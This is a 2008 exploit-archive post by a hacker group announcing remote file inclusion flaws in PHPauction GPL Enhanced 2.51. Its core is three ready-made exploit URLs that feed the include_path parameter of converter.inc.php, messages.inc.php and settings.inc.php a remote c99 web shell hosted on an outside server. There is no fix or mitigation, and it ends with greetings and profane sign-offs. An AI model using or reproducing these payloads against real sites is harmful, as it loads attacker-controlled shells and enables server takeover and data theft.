[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPauction GPL Enhanced 2.51 Multiple RFI Vulnerabilities
# Published : 2008-03-17
# Author : RoMaNcYxHaCkEr
# Previous Title : Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
# Next Title : XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability


# Name : PHPauction GPL 2.51 Multiple Remote File Include Vulnerabilities

# Download From : http://www.johnrayfield.com/phpauction/phpauction-gpl-enhanced-251.zip

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , alwheed )        

# Home Page :  WwW.4RxH.CoM              

+============================================================================+

# Vulne Codes In Files converter.inc.php & messages.inc.php & settings.inc.php In Differnet Lines

# Exploits :

http://4RxH.CoM/auction/includes/converter.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/messages.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/settings.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+============================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HotMail.iT

# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake

RxH

Best Wishes

# www.Syue.com [2008-03-17]